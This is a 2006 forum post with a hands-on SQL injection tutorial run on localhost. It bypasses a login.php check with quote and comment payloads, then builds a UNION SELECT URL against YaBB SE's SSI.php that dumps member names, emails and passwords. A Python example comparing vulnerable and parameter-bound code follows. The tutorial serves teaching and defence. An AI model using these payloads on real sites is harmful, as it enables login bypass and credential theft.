zbeng Posted November 14, 2006

I. Manipulating login.php Script

[01] Open the terminal and type (without prepending prompt symbols):

$ su -
# sql_tutorial_start

These commands will start all needed services in the background.

[02] Open the browser and check http://localhost/phpmyadmin/.

[03] Have a look at the database userdb that our login.php script is accessing.

[04] Have a look at the login.php script. To do this, open another terminal and type:

$ vi login.php

or, in case you are not familiar with the vi text editor, you can use the more user-friendly mcedit (or any other editor you wish):

$ mcedit login.php

[05] If you want to see the submitted query to get more information, delete the prepending slashes in the echo "$query " line:

[06] Now open the browser again and go to http://localhost/login.php. You will see a page similar to the one below:

[image: SQL_tutorial_02]

[07] Enter the username admin, which we know exists. As you can see, we cannot log in due to the missing password.

[08] Now append a ' to the username to see if the script is vulnerable. The script generates an error, so we can move on.

[09] Enter admin' OR 1=1 as username and see what happens.

[10] Out of the query we can see that we have a closing single quote that isn't opened.

[11] Enter admin 'OR 1='1 as username. Now the query is valid and we're in:

[12] To advance the attack you might want to check out the /* to comment out all the following. Enter admin' /* as username then and check the query:

SELECT * FROM `userlist` WHERE `username` = 'admin' /*' AND `password` = ''

is what we entered, but only the part before /* is processed by the database. This is why the statement is valid.

II. UNION SELECT

[01] We installed YABBSE under http://localhost/yabbse/. The vulnerable script is located at http://localhost/yabbse/SSI.php.

[02] Open the script in the console by typing:

$ vi /yabbse/SSI.php

or use whichever editor you want. Now move to line 222, where the query we are trying to manipulate is located.

[03] To get into the function recentTopics, call http://localhost/yabbse/SSI.php?function=recentTopics.

[04] In this query a variable $ID_MEMBER is processed. This is where we try to break in. We should now move to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1' (notice the single quote at the end). This results in an error, so the script is potentially vulnerable to an SQL injection attack.

[05] From the error message we can see that a table lmr referenced in the original query is now missing. We search for the original query in the editor and append the missing part to our query.

[06] Go to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER= 1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1) UNION SELECT ID_MEMBER, memberName FROM yabbse_members /*. From the error message we can see that the inserted SELECT statement doesn't have the same number of columns as the original one. We have to add something to make the counts equal then.

[07] Move your browser to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER= 1 OR 1=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT memberName, emailAddress, passwd, null, null, null, null, null, null, null, null, null FROM yabbse_members /*. Now we seem to have a valid query, but can only see the e-mail address:

[08] Have a look at line 223 and below. There is an HTML parser to be found that shows the result of our query. So what we have to do now is to move our null values around so the wanted columns land in the positions that get displayed.

[09] Move to http://localhost/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1) LEFT JOIN yabbse_log_mark_read AS lmr ON (lmr.ID_BOARD=t.ID_BOARD AND lmr.ID_MEMBER=1 OR 1=1) UNION SELECT null, memberName, null, emailAddress, null, passwd,null,null,null,null,null,null FROM yabbse_members /*.

There we are - we have managed to obtain all the information we wanted:

[10] Return to the terminal opened at the beginning (or open a new one) and issue the commands:

$ su -
# sql_tutorial_stop

This will stop all services needed to go through this tutorial.
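Both parts of the tutorial exploit the same coding mistake: user input is concatenated into the SQL text (a quoted string in login.php, an unquoted number in SSI.php's recentTopics query). The example below is an added illustration, not the tutorial's PHP nor YaBB SE code: it rebuilds each vulnerable pattern in Python against an in-memory SQLite database with a constructed userlist and a simplified topics table (the real yabbse_topics layout and the lmr join are not reproduced), and places the hardened form next to it. The vulnerable functions reproduce what the tutorial observes (a database error for a stray ', the /* comment swallowing the password check); the safe versions bind values as parameters and validate ID_MEMBER as an integer, so the same inputs are either compared literally or rejected. SQLite, like MySQL, treats an unterminated /* as a comment to the end of the statement, which is why step [12] of part I carries over.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the tutorial's userdb.userlist table and
    a minimal topics table; rows are sample data, not taken from the tutorial."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE userlist (username TEXT, password TEXT);
        INSERT INTO userlist VALUES ('admin', 's3cret'), ('guest', 'guest');
        CREATE TABLE yabbse_topics (ID_TOPIC INTEGER, ID_MEMBER INTEGER, subject TEXT);
        INSERT INTO yabbse_topics VALUES (1, 1, 'first post'), (2, 2, 'other post');
    """)
    return db


def login_vulnerable(db, username, password):
    """Same pattern as the tutorial's login.php: user input is pasted straight into
    the SQL text, so quotes and /* in the username change the statement itself.
    Returns (query, row) so the query can be inspected like the echo "$query" line."""
    query = ("SELECT * FROM userlist WHERE username = '" + username +
             "' AND password = '" + password + "'")
    row = db.execute(query).fetchone()
    return query, row


def login_safe(db, username, password):
    """Hardened form: the SQL text is fixed and the values are bound as parameters,
    so a username containing ' or /* is compared literally, never parsed as SQL."""
    query = "SELECT * FROM userlist WHERE username = ? AND password = ?"
    row = db.execute(query, (username, password)).fetchone()
    return query, row


def recent_topics_vulnerable(db, id_member):
    """Same pattern as the SSI.php query: $ID_MEMBER is interpolated unquoted, so a
    trailing ' breaks the statement (the error seen in step [04] of part II)."""
    query = ("SELECT ID_TOPIC, subject FROM yabbse_topics AS t "
             "WHERE (t.ID_MEMBER = " + id_member + ")")
    return db.execute(query).fetchall()


def recent_topics_safe(db, id_member):
    """Hardened form: accept only a decimal integer, then bind it as a parameter.
    Anything else is rejected before it can reach the database."""
    if not isinstance(id_member, str) or not re.fullmatch(r"[0-9]+", id_member):
        raise ValueError("ID_MEMBER must be a non-negative integer")
    query = "SELECT ID_TOPIC, subject FROM yabbse_topics AS t WHERE (t.ID_MEMBER = ?)"
    return db.execute(query, (int(id_member),)).fetchall()


def attempt(fn, *args):
    """Run fn and report ("ok", result) or ("error", exception class name). A database
    error surfacing to the user is exactly the signal the tutorial probes for."""
    try:
        return "ok", fn(*args)
    except (sqlite3.Error, ValueError) as exc:
        return "error", type(exc).__name__


if __name__ == "__main__":
    db = make_db()
    for name in ("admin", "admin'", "admin' /*"):
        print("vulnerable:", repr(name), "->", attempt(login_vulnerable, db, name, ""))
        print("safe:      ", repr(name), "->", attempt(login_safe, db, name, ""))
    for id_member in ("1", "1'"):
        print("vulnerable:", repr(id_member), "->", attempt(recent_topics_vulnerable, db, id_member))
        print("safe:      ", repr(id_member), "->", attempt(recent_topics_safe, db, id_member))
```

Two details matter for the fix. Parameter binding is what removes the bug, not escaping: with a bound parameter the database never tokenizes the username, so there is no quote to close and no comment to open. For the numeric case, whitelisting the input as digits before the query is built also turns the "error on a stray quote" probe into a plain validation failure, which is what you want a login or forum page to show instead of a database error message.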